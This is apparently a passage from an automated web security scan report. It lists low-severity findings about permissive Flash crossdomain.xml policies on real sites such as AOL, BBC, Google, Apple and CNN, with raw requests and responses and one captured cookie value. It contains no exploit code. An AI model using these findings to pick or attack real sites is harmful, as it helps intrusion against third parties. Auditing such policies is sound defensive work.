Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

6.83. http://fantasysource.sportingnews.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fantasysource.sportingnews.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fantasysource.sportingnews.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 10:53:00 GMT
Content-Type: text/xml
Content-Length: 540
Last-Modified: Tue, 21 Sep 2010 17:41:28 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sportingnews.com" />
<allow-access-from domain="*.snimg.com" />
<allow-access-from domain="*.sn.internal" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.avatarlabs.com" />
<allow-access-from domain="*.doubleclick.com" />
<allow-access-from domain="*.dartmotif.com" />
...[SNIP]...

6.84. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=53
Expires: Thu, 05 May 2011 12:38:37 GMT
Date: Thu, 05 May 2011 12:37:44 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.85. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 04 May 2011 15:54:51 GMT
Expires: Thu, 05 May 2011 15:54:51 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 68294

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.86. http://images.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://images.apple.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=600
Expires: Thu, 05 May 2011 12:53:21 GMT
Date: Thu, 05 May 2011 12:43:21 GMT
Connection: close
Set-Cookie: ccl=N3+E7KRa7e7+/aiwBdm1+BBc2KYHGDetWMacheD7BGTuImGKNb3bJrnGqZQZoHDUKqBMvJiY4M5DpHzFr6KzsY3/0RY7k0/qF2m3dB7SutEKFtCs/Rc9jTSDLk71/af4ppeqMh5I+4zqxLaxjKQsIa0zglBjNHYEqmkPx5f9PSpPYxJh0FNbdMSlsqNOct7luT+L+OtvRoood+QyHFgl+bbTBXedn+5nEqpsN2lHhxbklinCwzYFFZ++po8fczmNDnczw1eRYDkrwL1F+Gp3TyavVy29kVw1tXQggL40ipYQPzmNkION3nRMD096Xfsd3Pr214xIRKWi5jSS1kYHoZuvEGJi2VOzja6Y3HGXwJ1CqFlXxbdnx7/Fhi218sDYetbJfgnlqsasY/fcM9azujcMy0arx+fGKSMneLWjTOvfmfLfUuRfZFigdwtUzA9tiwfUiMZSAqNDxU9oIYnxtwK0VhQFZCd6ZP3spuFntB+UxMDYDF9uExDIHH8PlD3KFYJXAHoEnIhp7JAqnadbcNnCABozr4oygk6snPVWtMHroY5NqA2u7YuhVBLKje+v; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

6.87. http://itunes.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Apr 2011 15:19:07 GMT
ETag: "1b0-4a0ce546d50c0"
Accept-Ranges: bytes
Content-Length: 432
Content-Type: text/xml
Cache-Control: public, no-transform, max-age=2114
Date: Thu, 05 May 2011 10:53:09 GMT
Connection: close
X-Apple-Partner: origin.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.apple.com" />
<allow-access-from domain="*.apple.com.edgesuite.net" />
<allow-access-from domain="nikeplus.nike.com"/>
<allow-access-from domain="nikerunning.nike.com"/>
...[SNIP]...

6.88. http://js.adsonar.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://js.adsonar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 01:28:58 GMT
Date: Thu, 05 May 2011 00:58:58 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.89. http://legal.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://legal.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: legal.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:14 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999926
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.90. http://money.cnn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: money.cnn.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:13 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 16:52:05 GMT
Accept-Ranges: bytes
Content-Length: 922
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cnn.com" />
<allow-access-from domain="*.turner.com" />
<allow-access-from domain="*.cnn.net" />
<allow-access-from domain="*.secondthought.com"/>
<allow-access-from domain="72.3.226.28"/>
<allow-access-from domain="isg-marketing.com"/>
<allow-access-from domain="*.isg-marketing.com"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="studio.doubleclick.com"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...

6.91. http://music.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://music.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.92. http://my.screenname.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.screenname.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: my.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:56 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 21:13:54 GMT
ETag: "3f1-4a1601a1ec880"
Accept-Ranges: bytes
Content-Length: 1009
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=6
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fantasy-interactive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.musicnow.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aol.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...

6.93. https://my.screenname.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://my.screenname.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: my.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 21:13:54 GMT
ETag: "3f1-4a1601a1ec880"
Accept-Ranges: bytes
Content-Length: 1009
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fantasy-interactive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.musicnow.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aol.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...

6.94. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=115
Expires: Thu, 05 May 2011 12:39:38 GMT
Date: Thu, 05 May 2011 12:37:43 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.95. http://o.aolcdn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://o.aolcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "86252e13a238a19354a0bc819378c538:1294158341"
Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT
Content-Type: application/xml
Cache-Control: max-age=1017380
Expires: Mon, 16 May 2011 19:33:10 GMT
Date: Thu, 05 May 2011 00:56:50 GMT
Content-Length: 3059
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSc
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.web.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.my.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.estage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.stream.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tmz.warnerbros.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.platformaprojects.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.atwola.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.advertising.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ad-preview.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.icq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="studionow.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.studionow.com" secure="false"/>
...[SNIP]...

6.96. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 04 May 2011 15:21:29 GMT
Expires: Thu, 05 May 2011 15:21:29 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 34589

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.97. http://picasaweb.google.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 06 May 2011 10:53:28 GMT
Date: Thu, 05 May 2011 10:53:28 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
